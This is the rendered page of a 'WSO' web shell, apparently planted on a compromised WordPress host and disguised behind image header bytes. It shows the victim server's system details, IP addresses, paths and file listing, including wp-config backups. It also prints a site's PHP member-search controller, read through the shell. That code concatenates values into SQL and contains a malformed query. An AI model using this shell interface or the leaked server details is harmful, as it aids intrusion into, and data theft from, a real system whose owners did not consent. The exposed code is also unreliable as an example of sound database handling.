����JFIF���������www.stoptube.com - WSOX ENC
Attention:
Uname:
Php:
Hdd:
Cwd:		Mr.X WSO Webshell! - Personal WEB SHELL Mr.X BYPASS! V2.5 Telegram: @jackleet
Linux msm5694.mjhst.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
5.3.29 Safe mode: OFF Datetime: 2026-04-09 05:25:16
1999.30 GB Free: 61.24 GB (3%)
/home/httpd/html/stoptube.com/ drwxr-xr-x [ root ] [ home ] Text

Server IP:
127.0.0.54
Client IP:
216.73.216.53
[ Files ][ Logout ]

File manager

NameSizeModifyPermissionsActions
[ . ]dir2020-10-29 21:25:34drwxr-xr-xRename Touch
[ .. ]dir2026-04-09 05:25:14drwxr-xr-xRename Touch
[ cgi-bin ]dir2012-04-08 21:15:31drwxr-xr-xRename Touch
[ public_html ]dir2023-11-10 01:29:28drwxr-xr-xRename Touch
[ stats ]dir2012-05-18 05:35:08drwxr-xr-xRename Touch
[ wp-admin ]dir2018-10-17 02:02:36drwxr-xr-xRename Touch
[ wp-content ]dir2026-04-09 05:24:14drwxrwxr-xRename Touch
[ wp-includes ]dir2018-10-17 02:02:35drwxrwxr-xRename Touch
[ wpbackup-mojo ]dir2013-09-23 12:20:27drwxr-xr-xRename Touch
120x240_2.gif13.45 KB2008-06-28 03:13:23-rw-r--r--Rename Touch Edit Download
120x240_4.gif11.19 KB2008-06-28 03:15:01-rw-r--r--Rename Touch Edit Download
google33e705b4a02b516c.html53 B2018-10-09 07:59:06-rw-r--r--Rename Touch Edit Download
google54c2bf32c9bf2083.html7 B2009-05-30 01:17:01-rw-r--r--Rename Touch Edit Download
grepsearch.php910 B2009-05-31 03:50:51-rw-r--r--Rename Touch Edit Download
index.php418 B2018-10-17 02:00:34-rw-r--r--Rename Touch Edit Download
license.txt19.47 KB2018-10-17 02:00:34-rw-r--r--Rename Touch Edit Download
readme.html7.24 KB2020-10-29 21:25:34-rw-r--r--Rename Touch Edit Download
robots.txt29 B2014-04-01 00:38:43-rw-r--r--Rename Touch Edit Download
scan_files.php3.34 KB2009-06-03 20:33:08-rw-r--r--Rename Touch Edit Download
wp-activate.php6.72 KB2018-12-13 02:57:59-rw-r--r--Rename Touch Edit Download
wp-atom.php226 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-blog-header.php364 B2018-10-17 02:02:31-rw-r--r--Rename Touch Edit Download
wp-comments-post.php1.84 KB2018-10-17 02:02:31-rw-r--r--Rename Touch Edit Download
wp-commentsrss2.php244 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-config-sample.php2.79 KB2018-10-17 02:02:31-rw-r--r--Rename Touch Edit Download
wp-config.php1.47 KB2018-10-04 12:51:18-rw-rw-r--Rename Touch Edit Download
wp-config.php_backup_ticket_5246641.30 KB2018-10-03 15:00:12-rw-r--r--Rename Touch Edit Download
wp-cron.php3.58 KB2018-10-17 02:02:31-rw-r--r--Rename Touch Edit Download
wp-feed.php246 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-links-opml.php2.37 KB2018-10-17 02:02:34-rw-r--r--Rename Touch Edit Download
wp-load.php3.23 KB2018-10-17 02:02:34-rw-r--r--Rename Touch Edit Download
wp-login.php36.92 KB2018-12-13 02:57:59-rw-r--r--Rename Touch Edit Download
wp-mail.php7.86 KB2018-10-17 02:02:34-rw-r--r--Rename Touch Edit Download
wp-pass.php494 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-rdf.php224 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-register.php334 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-rss.php224 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-rss2.php226 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-settings.php15.87 KB2018-10-17 02:02:34-rw-r--r--Rename Touch Edit Download
wp-signup.php29.39 KB2018-10-17 02:02:34-rw-r--r--Rename Touch Edit Download
wp-trackback.php4.51 KB2018-10-17 02:02:34-rw-r--r--Rename Touch Edit Download
wpupdate.sh12.75 KB2013-09-22 17:09:27-rw-r--r--Rename Touch Edit Download
xmlrpc.php2.99 KB2018-10-17 02:02:34----------Rename Touch Edit Download
 
Change dir:
Read file:
Make dir: (Not writable)
Make file: (Not writable)
Terminal:
Upload file: (Not writable)

HEX
HEX
Server: Apache
System: Linux msm5694.mjhst.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User: camjab_ssh (1000)
PHP: 5.3.29
Disabled: NONE
$ pwd: /home/httpd/html/baretube.com.new/controllers/
Upload Files
File: /home/httpd/html/baretube.com.new/controllers/control.members.php
<?php
    $filterAnd = "";
    if ($_POST) {
	$_POST = mysql_real_escape_array($_POST);
        // set name
        if (!empty($_POST['name'])) {
            $_SESSION['ms']['name'] = mysqli_real_escape_string($dblink,$_POST['name']);
        } else {
            unset($_SESSION['ms']['name']);
        }

        // set age
        $ageF = explode(";", $_POST['filter_age']);
        if (!empty($ageF) && $ageF[0] > 18) {

            $_SESSION['ms']['ageFrom'] = mysqli_real_escape_string($dblink,$ageF[0]);
        } else {
            unset($_SESSION['ms']['ageFrom']);
        }
        if (!empty($ageF) && $ageF[1] < 98) {
            $_SESSION['ms']['ageTo'] = mysqli_real_escape_string($dblink,$ageF[1]);
        } else {
            unset($_SESSION['ms']['ageTo']);
        }

        // set location
        if (!empty($_POST['location'])) {
            $_SESSION['ms']['location'] = mysqli_real_escape_string($dblink,$_POST['location']);
        } else {
            unset($_SESSION['ms']['location']);
        }

        // set gender
        if ($_POST['gender'] != "all") {
            $_SESSION['ms']['gender'] = mysqli_real_escape_string($dblink,$_POST['gender']);
        } else {
            unset($_SESSION['ms']['gender']);
        }

        // set avatar
        if ($_POST['hasAvatar'] == 1) {
            $_SESSION['ms']['avatar'] = mysqli_real_escape_string($dblink,$_POST['hasAvatar']);
        } else {
            unset($_SESSION['ms']['avatar']);
        }

        // set videos
        if ($_POST['hasVideos'] == 1) {
            $_SESSION['ms']['video'] = mysqli_real_escape_string($dblink,$_POST['hasVideos']);
        } else {
            unset($_SESSION['ms']['video']);
        }

        // set photos
        if ($_POST['hasPhotos'] == 1) {
            $_SESSION['ms']['photo'] = mysqli_real_escape_string($dblink,$_POST['hasPhotos']);
        } else {
            unset($_SESSION['ms']['photo']);
        }
    }

    if ($_GET[sortby] == "date_joined") {
        $_SESSION['ms']['order'] = "ORDER BY date_joined";
    } else if ($_GET[sortby] == "alphabetical") {
        $_SESSION['ms']['order'] = "ORDER BY username";
    }
    if ($_SESSION['ms']['order']) {
        $order = mysqli_real_escape_string($dblink,$_SESSION['ms']['order']);
    } else {
        $order = "ORDER BY username";
    }

    if ($_GET['clearForm'] == "1") {
        unset($_SESSION['ms']);
    }

    $max_results = $results_per_page;
    if (!isset($_GET['page']) || $_GET[page] == '' || !is_numeric($_GET[page])) {
        $page = 1;
    } else {
        $page = (int)$_GET['page'];
    }
    $from = (($page * $max_results) - $max_results);

    // SET FILTERS
    if ($_SESSION['ms']['name']) {
        $filterAnd .= " AND users.username LIKE '%" . $_SESSION['ms']['name'] . "%'";
    }
    if ($_SESSION['ms']['ageFrom']) {
        $filterAnd .= " AND users.age >= '" . (int) $_SESSION['ms']['ageFrom'] . "'";
    }
    if ($_SESSION['ms']['ageTo']) {
        $filterAnd .= " AND users.age <= '" . (int) $_SESSION['ms']['ageTo'] . "'";
    }
    if ($_SESSION['ms']['location']) {
        $filterAnd .= " AND users.location LIKE '%" . $_SESSION['ms']['location'] . "%'";
    }
    if ($_SESSION['ms']['gender']) {
        $filterAnd .= " AND users.gender = '" . $_SESSION['ms']['gender'] . "'";
    }
    if ($_SESSION['ms']['avatar']) {
        $filterAnd .= " AND users.avatar != ''";
    }

    // ONLY VIDEO
    $photos = 'AND content.photos = 0';

    // ALL
    if ($_SESSION['ms']['photo'] && $_SESSION['ms']['video']) {
        $photos = '';
    } else if ($_SESSION['ms']['photo'] && !$_SESSION['ms']['video']) {
        $photos = 'AND content.photos = 1';
    }
    // ONLY PHOTOS
    if ($_SESSION['ms']['video'] || $_SESSION['ms']['photo']) {
        $filterAnd .= " AND users.record_num IN(SELECT content.submitter FROM content WHERE content.enabled = '1' content.submitter = users.record_num $photos)";
    }

    $result = dbQuery("SELECT COUNT(record_num) AS counter FROM users WHERE date_joined != 0 $filterAnd", true);
    $total_results = $result[0]['counter'];
    $result = dbQuery("SELECT * FROM users WHERE date_joined != 0 $filterAnd $order ASC LIMIT $from,$max_results", true);
    $total_pages = ceil($total_results / $max_results);
?>
@ Telegram